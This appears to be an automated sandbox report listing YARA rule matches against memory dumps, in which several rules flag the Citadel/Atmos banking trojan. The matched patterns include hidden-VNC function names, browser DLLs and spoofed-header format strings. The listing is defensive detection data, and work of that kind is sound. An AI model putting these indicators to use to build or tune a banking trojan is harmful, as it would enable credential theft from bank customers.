00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 D4 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 D4 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 D4 00
00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 FB 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 FB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 FB 00
00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 90 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 90 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 90 00
00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 3D 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 3D 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 3D 00
00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x120df:$MZ: 4D 5A 0x12227:$MZ: 4D 5A 0x1521d:$MZ: 4D 5A 0x1f494:$MZ: 4D 5A 0x1f4d4:$MZ: 4D 5A 0x3fa68:$MZ: 4D 5A 0x3e734:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 41 00 57 33 DB BF 00 28 00 00 0x3e7d8:$b: 68 C8 00 00 00 FF 15 4C 12 41 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f680:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f6a0:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e587:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 41 00
00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8fa8:$c: %BOTID% 0x8fb0:$d: %BOTNET% 0x90c4:$f: bc_remove 0x90d0:$g: bc_add 0x7dc8:$ggurl: http://www.google.com/webhp
0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 E2 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 E2 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 E2 00
0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 81 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 81 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 81 00
0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 91 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 91 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 91 00
00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
